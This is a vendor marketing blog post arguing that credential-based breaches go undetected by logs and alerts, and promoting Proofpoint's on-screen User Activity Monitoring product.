Reports of data breaches have quickly become a daily occurrence. As we’ve highlighted in our past Breach Reports, many of these companies aren’t discovering these breaches until months after the initial breach occurred and further they are actually being found by external entities not by the organisations themselves.
Although numerous data breaches happen due to internal negligence or internal malicious activity, most data breaches are occurring due to outside threats. These fraudulent users are stealing user credentials in order to access these systems undetected. Companies do a lot to make sure their employee credentials are secure, but often these measures aren’t enough, and fraudulent users are able to gain access of employee credentials. In fact, over 67% of data breaches involve stolen credentials. Why are breaches occurring?
Once a malicious user successfully obtains privileged access, it is almost impossible for a traditional intrusion detection system to differentiate between activities performed by the actual user that had his credentials stolen, versus a fraudulent user that is logging in with the same credentials. If a malicious user stays within the access boundaries of the credentials obtained, there is nothing for these detection systems to distinguish. Furthermore, a fraudulent user can use the initial access to continue compromising additional credentials and escalate their privileges.
So what are companies doing today to mitigate this risk and why isn’t it working?
Typically companies first look to logs. However, a major problem with log tools is that most logs were developed for debug purposes and not for tracking user activity. Logs are stored in a central repository, such as a Log Management solution or SIEM. These tools are only as good as what they’re fed with, and to date we have been feeding them with amazing amounts of machine data; data about what is going on at the network and infrastructure layer. However, they are missing an absolutely critical viewpoint, what the users are actually doing on top of that infrastructure.
Companies’ second step is to focus on alerting of potential threats. However, this can prove to be detrimental, seeing as in most cases only one out of ten alerts require an incident to actually be investigated. That means nine out of ten alerts are a waste of time. Companies are investing plenty of money for these alert systems, but not enough money in the response teams who review these alerts. As a result, these false alerts make the real alerts harder to distinguish for these understaffed alert response teams.
So how can we improve?
In order to combat the spotty effectiveness of logs and threat detection, companies must start to focus on a critical missing vantage point, privileged User Activity Monitoring. Proofpoint User Activity Monitoring uses on-screen activity recording technology to record the activity of users logged into critical servers. This user activity is then converted into a video providing IT security with the ability to playback any user activity in real-time or historically.
Yet in terms of analysis, these videos lack pinpoint capabilities, meaning they can’t specifically pick out a security issue. Instead, these videos still need to be manually analysed. Proofpoint solves this problem with our visual interpretation technology to turn captured on-screen activity into searchable, analysable and reportable machine data. This enables Security teams to work with a list of actions from the video providing the ability to easily find the actions they’re looking for. This visibility significantly improves forensic capabilities by enabling the user to rapidly triage and diagnose alerts.
So why are 85% of breaches going undetected?
The answer is simple, with all our investment in infrastructure security and prevention, we forgot a critical component, our users! User Activity Monitoring is rapidly becoming an integral part of cyber surveillance and data breach detection because it fills this most critical gap, and integrates easily with the other key components of any security architecture. It’s a simple concept that has been working effectively for ages in the physical world that the digital world has been missing until now. Unless companies start introducing proper user focused monitoring tools, data breaches will continue to go undetected.
So stop trying to interpret the activity of your users by looking a log data from your machines, rather turn your user activity data into machine parable logs with Proofpoint ITM!